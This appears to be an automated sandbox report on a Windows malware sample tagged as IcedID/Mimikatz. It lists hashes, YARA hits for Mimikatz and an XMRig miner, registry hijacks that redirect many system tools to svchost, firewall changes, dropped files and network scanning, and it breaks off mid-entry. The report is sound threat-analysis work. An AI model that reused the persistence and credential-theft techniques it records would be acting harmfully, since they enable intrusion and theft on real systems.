Analysis
-
max time kernel
150s -
max time network
152s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system -
submitted
01-09-2024 18:08
Behavioral task
behavioral1
Sample
20240901c75c95da4d5c6642a99c8397eecde2d2hacktoolsicedidmimikatz.exe
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
20240901c75c95da4d5c6642a99c8397eecde2d2hacktoolsicedidmimikatz.exe
Resource
win10v2004-20240802-en
General
-
Target
20240901c75c95da4d5c6642a99c8397eecde2d2hacktoolsicedidmimikatz.exe
-
Size
10.6MB
-
MD5
c75c95da4d5c6642a99c8397eecde2d2
-
SHA1
818cfc765d62b8a1740ce49752fed11b360c494e
-
SHA256
56c87da21cb90893f323e92f50ee8128b490ab5e0d0e9221a4c8a85936a67259
-
SHA512
ca6742978b299b0aec29076240c4e5f5b57f203df50594d8741905e8caea570798f535e6e64dae8dbb276f046a92634a33b0a66324446cd1618381af1a755d28
-
SSDEEP
98304:YmBtyYXmknGzZr+HdO5SEPFtmOZ9G1Md5v/nZVnivsAl0eXTBJYa5roSCaa:I6mknGzwHdOgEPHd9BbX/nivPlTXTYr
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 2596 created 552 2596 nmtkkif.exe 17 -
Contacts a large (17909) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 10 IoCs
resource yara_rule behavioral1/memory/2228-191-0x000000013F7C0000-0x000000013F8E0000-memory.dmp xmrig behavioral1/memory/2228-204-0x000000013F7C0000-0x000000013F8E0000-memory.dmp xmrig behavioral1/memory/2228-225-0x000000013F7C0000-0x000000013F8E0000-memory.dmp xmrig behavioral1/memory/2228-227-0x000000013F7C0000-0x000000013F8E0000-memory.dmp xmrig behavioral1/memory/2228-228-0x000000013F7C0000-0x000000013F8E0000-memory.dmp xmrig behavioral1/memory/2228-229-0x000000013F7C0000-0x000000013F8E0000-memory.dmp xmrig behavioral1/memory/2228-245-0x000000013F7C0000-0x000000013F8E0000-memory.dmp xmrig behavioral1/memory/2228-247-0x000000013F7C0000-0x000000013F8E0000-memory.dmp xmrig behavioral1/memory/2228-248-0x000000013F7C0000-0x000000013F8E0000-memory.dmp xmrig behavioral1/memory/2228-249-0x000000013F7C0000-0x000000013F8E0000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 9 IoCs
resource yara_rule behavioral1/memory/2372-0-0x0000000000400000-0x0000000000AA4000-memory.dmp mimikatz behavioral1/memory/2372-4-0x0000000000400000-0x0000000000AA4000-memory.dmp mimikatz behavioral1/files/0x0008000000016d41-5.dat mimikatz behavioral1/memory/3024-9-0x0000000000400000-0x0000000000AA4000-memory.dmp mimikatz behavioral1/memory/1628-138-0x000000013FE60000-0x000000013FF4E000-memory.dmp mimikatz behavioral1/memory/1628-136-0x000000013FE60000-0x000000013FF4E000-memory.dmp mimikatz behavioral1/memory/2268-135-0x00000000005E0000-0x00000000006CE000-memory.dmp mimikatz behavioral1/memory/2596-161-0x0000000002E40000-0x0000000002E9B000-memory.dmp mimikatz behavioral1/memory/2596-170-0x0000000002F80000-0x00000000030A0000-memory.dmp mimikatz -
Drops file in Drivers directory 2 IoCs
description ioc Process File created C:\Windows\system32\drivers\npf.sys wpcap.exe File opened for modification C:\Windows\system32\drivers\etc\hosts nmtkkif.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" nmtkkif.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe nmtkkif.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" nmtkkif.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe nmtkkif.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" nmtkkif.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe nmtkkif.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" nmtkkif.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" nmtkkif.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" nmtkkif.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" nmtkkif.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" nmtkkif.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe nmtkkif.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe nmtkkif.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe nmtkkif.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" nmtkkif.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" nmtkkif.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" nmtkkif.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" nmtkkif.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe nmtkkif.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe nmtkkif.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" nmtkkif.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" nmtkkif.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe nmtkkif.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" nmtkkif.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe nmtkkif.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe nmtkkif.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe nmtkkif.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" nmtkkif.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" nmtkkif.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe nmtkkif.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe nmtkkif.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe nmtkkif.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe nmtkkif.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" nmtkkif.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" nmtkkif.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" nmtkkif.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe nmtkkif.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe nmtkkif.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe nmtkkif.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe nmtkkif.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 1096 netsh.exe 1944 netsh.exe -
Executes dropped EXE 18 IoCs
pid Process 3024 nmtkkif.exe 2596 nmtkkif.exe 2628 wpcap.exe 696 bbhnhqbdt.exe 1628 vfshost.exe 1972 xohudmc.exe 828 wwgkke.exe 2368 etdhzaten.exe 2228 tcnepb.exe 2444 etdhzaten.exe 3024 etdhzaten.exe 2600 nmtkkif.exe 1904 etdhzaten.exe 2660 etdhzaten.exe 2776 etdhzaten.exe 1060 etdhzaten.exe 2532 ztkhemnnz.exe 1640 nmtkkif.exe -
Loads dropped DLL 24 IoCs
pid Process 2828 cmd.exe 2828 cmd.exe 1484 cmd.exe 2628 wpcap.exe 2628 wpcap.exe 2628 wpcap.exe 2628 wpcap.exe 2628 wpcap.exe 1052 cmd.exe 696 bbhnhqbdt.exe 696 bbhnhqbdt.exe 2268 cmd.exe 2268 cmd.exe 2596 nmtkkif.exe 2596 nmtkkif.exe 2596 nmtkkif.exe 2596 nmtkkif.exe 2596 nmtkkif.exe 2596 nmtkkif.exe 2596 nmtkkif.exe 2596 nmtkkif.exe 2596 nmtkkif.exe 2596 nmtkkif.exe 1016 cmd.exe -
resource yara_rule behavioral1/memory/1628-138-0x000000013FE60000-0x000000013FF4E000-memory.dmp upx behavioral1/memory/1628-136-0x000000013FE60000-0x000000013FF4E000-memory.dmp upx behavioral1/files/0x000500000001a4dc-133.dat upx behavioral1/memory/2368-162-0x000000013F550000-0x000000013F5AB000-memory.dmp upx behavioral1/files/0x000500000001a4f8-160.dat upx behavioral1/memory/2368-166-0x000000013F550000-0x000000013F5AB000-memory.dmp upx behavioral1/files/0x000500000001a4ed-168.dat upx behavioral1/memory/2228-172-0x000000013F7C0000-0x000000013F8E0000-memory.dmp upx behavioral1/memory/2596-170-0x0000000002F80000-0x00000000030A0000-memory.dmp upx behavioral1/memory/2444-178-0x000000013F120000-0x000000013F17B000-memory.dmp upx behavioral1/memory/2444-180-0x000000013F120000-0x000000013F17B000-memory.dmp upx behavioral1/memory/3024-186-0x000000013FE60000-0x000000013FEBB000-memory.dmp upx behavioral1/memory/3024-188-0x000000013FE60000-0x000000013FEBB000-memory.dmp upx behavioral1/memory/2228-191-0x000000013F7C0000-0x000000013F8E0000-memory.dmp upx behavioral1/memory/2596-197-0x0000000001A00000-0x0000000001A5B000-memory.dmp upx behavioral1/memory/1904-201-0x000000013FE30000-0x000000013FE8B000-memory.dmp upx behavioral1/memory/2228-204-0x000000013F7C0000-0x000000013F8E0000-memory.dmp upx behavioral1/memory/2660-207-0x000000013F0C0000-0x000000013F11B000-memory.dmp upx behavioral1/memory/2660-209-0x000000013F0C0000-0x000000013F11B000-memory.dmp upx behavioral1/memory/2596-212-0x0000000001A00000-0x0000000001A5B000-memory.dmp upx behavioral1/memory/2776-216-0x000000013F4A0000-0x000000013F4FB000-memory.dmp upx behavioral1/memory/1060-221-0x000000013FF40000-0x000000013FF9B000-memory.dmp upx behavioral1/memory/1060-223-0x000000013FF40000-0x000000013FF9B000-memory.dmp upx behavioral1/memory/2228-225-0x000000013F7C0000-0x000000013F8E0000-memory.dmp upx behavioral1/memory/2596-226-0x0000000001A00000-0x0000000001A5B000-memory.dmp upx behavioral1/memory/2228-227-0x000000013F7C0000-0x000000013F8E0000-memory.dmp upx behavioral1/memory/2228-228-0x000000013F7C0000-0x000000013F8E0000-memory.dmp upx behavioral1/memory/2228-229-0x000000013F7C0000-0x000000013F8E0000-memory.dmp upx behavioral1/memory/2228-245-0x000000013F7C0000-0x000000013F8E0000-memory.dmp upx behavioral1/memory/2228-247-0x000000013F7C0000-0x000000013F8E0000-memory.dmp upx behavioral1/memory/2228-248-0x000000013F7C0000-0x000000013F8E0000-memory.dmp upx behavioral1/memory/2228-249-0x000000013F7C0000-0x000000013F8E0000-memory.dmp upx -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 19 ifconfig.me 20 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 12 IoCs
description ioc Process File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 nmtkkif.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 nmtkkif.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat nmtkkif.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File created C:\Windows\system32\Packet.dll wpcap.exe File created C:\Windows\SysWOW64\wwgkke.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\wwgkke.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DDAB91A53CE5876D153BF0B6B3BA7DCE nmtkkif.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DDAB91A53CE5876D153BF0B6B3BA7DCE nmtkkif.exe -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe File created C:\Program Files\WinPcap\LICENSE wpcap.exe File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe -
Drops file in Windows directory 60 IoCs
description ioc Process File created C:\Windows\thbtuhijz\UnattendGC\specials\tibe-2.dll nmtkkif.exe File opened for modification C:\Windows\mtbebkte\docmicfg.xml nmtkkif.exe File created C:\Windows\thbtuhijz\UnattendGC\specials\exma-1.dll nmtkkif.exe File created C:\Windows\thbtuhijz\UnattendGC\specials\xdvl-0.dll nmtkkif.exe File created C:\Windows\thbtuhijz\UnattendGC\specials\zlib1.dll nmtkkif.exe File created C:\Windows\thbtuhijz\UnattendGC\specials\spoolsrv.exe nmtkkif.exe File opened for modification C:\Windows\mtbebkte\spoolsrv.xml nmtkkif.exe File opened for modification C:\Windows\mtbebkte\schoedcl.xml nmtkkif.exe File created C:\Windows\thbtuhijz\UnattendGC\specials\posh-0.dll nmtkkif.exe File created C:\Windows\thbtuhijz\UnattendGC\specials\vimpcsvc.xml nmtkkif.exe File created C:\Windows\thbtuhijz\Corporate\mimidrv.sys nmtkkif.exe File created C:\Windows\thbtuhijz\Corporate\mimilib.dll nmtkkif.exe File created C:\Windows\thbtuhijz\bimkzibim\ip.txt nmtkkif.exe File created C:\Windows\thbtuhijz\bimkzibim\ztkhemnnz.exe nmtkkif.exe File created C:\Windows\thbtuhijz\UnattendGC\specials\svschost.exe nmtkkif.exe File created C:\Windows\mtbebkte\vimpcsvc.xml nmtkkif.exe File created C:\Windows\thbtuhijz\UnattendGC\specials\ucl.dll nmtkkif.exe File created C:\Windows\thbtuhijz\UnattendGC\AppCapture32.dll nmtkkif.exe File created C:\Windows\thbtuhijz\bimkzibim\bbhnhqbdt.exe nmtkkif.exe File created C:\Windows\thbtuhijz\bimkzibim\Packet.dll nmtkkif.exe File created C:\Windows\thbtuhijz\UnattendGC\specials\ssleay32.dll nmtkkif.exe File created C:\Windows\thbtuhijz\UnattendGC\specials\trch-1.dll nmtkkif.exe File created C:\Windows\thbtuhijz\UnattendGC\specials\trfo-2.dll nmtkkif.exe File created C:\Windows\thbtuhijz\UnattendGC\svschost.xml nmtkkif.exe File opened for modification C:\Windows\mtbebkte\nmtkkif.exe 20240901c75c95da4d5c6642a99c8397eecde2d2hacktoolsicedidmimikatz.exe File created C:\Windows\thbtuhijz\UnattendGC\specials\schoedcl.exe nmtkkif.exe File opened for modification C:\Windows\mtbebkte\vimpcsvc.xml nmtkkif.exe File opened for modification C:\Windows\thbtuhijz\bimkzibim\Result.txt ztkhemnnz.exe File created C:\Windows\mtbebkte\nmtkkif.exe 20240901c75c95da4d5c6642a99c8397eecde2d2hacktoolsicedidmimikatz.exe File created C:\Windows\thbtuhijz\UnattendGC\specials\coli-0.dll nmtkkif.exe File created C:\Windows\thbtuhijz\UnattendGC\specials\crli-0.dll nmtkkif.exe File created C:\Windows\thbtuhijz\UnattendGC\schoedcl.xml nmtkkif.exe File created C:\Windows\thbtuhijz\UnattendGC\specials\svschost.xml nmtkkif.exe File created C:\Windows\mtbebkte\docmicfg.xml nmtkkif.exe File created C:\Windows\thbtuhijz\UnattendGC\specials\libeay32.dll nmtkkif.exe File created C:\Windows\thbtuhijz\bimkzibim\wpcap.dll nmtkkif.exe File created C:\Windows\mtbebkte\svschost.xml nmtkkif.exe File created C:\Windows\thbtuhijz\UnattendGC\vimpcsvc.xml nmtkkif.exe File created C:\Windows\thbtuhijz\upbdrjv\swrpwe.exe nmtkkif.exe File opened for modification C:\Windows\thbtuhijz\Corporate\log.txt cmd.exe File created C:\Windows\thbtuhijz\UnattendGC\specials\libxml2.dll nmtkkif.exe File created C:\Windows\mtbebkte\spoolsrv.xml nmtkkif.exe File created C:\Windows\thbtuhijz\UnattendGC\Shellcode.ini nmtkkif.exe File created C:\Windows\thbtuhijz\UnattendGC\AppCapture64.dll nmtkkif.exe File created C:\Windows\thbtuhijz\bimkzibim\scan.bat nmtkkif.exe File opened for modification C:\Windows\thbtuhijz\bimkzibim\Packet.dll nmtkkif.exe File created C:\Windows\thbtuhijz\UnattendGC\docmicfg.xml nmtkkif.exe File created C:\Windows\thbtuhijz\UnattendGC\specials\docmicfg.xml nmtkkif.exe File created C:\Windows\thbtuhijz\UnattendGC\specials\schoedcl.xml nmtkkif.exe File created C:\Windows\thbtuhijz\UnattendGC\specials\cnli-1.dll nmtkkif.exe File created C:\Windows\thbtuhijz\UnattendGC\specials\tucl-1.dll nmtkkif.exe File created C:\Windows\thbtuhijz\UnattendGC\specials\vimpcsvc.exe nmtkkif.exe File created C:\Windows\thbtuhijz\UnattendGC\spoolsrv.xml nmtkkif.exe File opened for modification C:\Windows\mtbebkte\svschost.xml nmtkkif.exe File created C:\Windows\thbtuhijz\Corporate\vfshost.exe nmtkkif.exe File created C:\Windows\thbtuhijz\bimkzibim\wpcap.exe nmtkkif.exe File created C:\Windows\thbtuhijz\UnattendGC\specials\docmicfg.exe nmtkkif.exe File created C:\Windows\thbtuhijz\UnattendGC\specials\spoolsrv.xml nmtkkif.exe File created C:\Windows\mtbebkte\schoedcl.xml nmtkkif.exe File created C:\Windows\ime\nmtkkif.exe nmtkkif.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 956 sc.exe 932 sc.exe 1736 sc.exe 1900 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bbhnhqbdt.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xohudmc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened 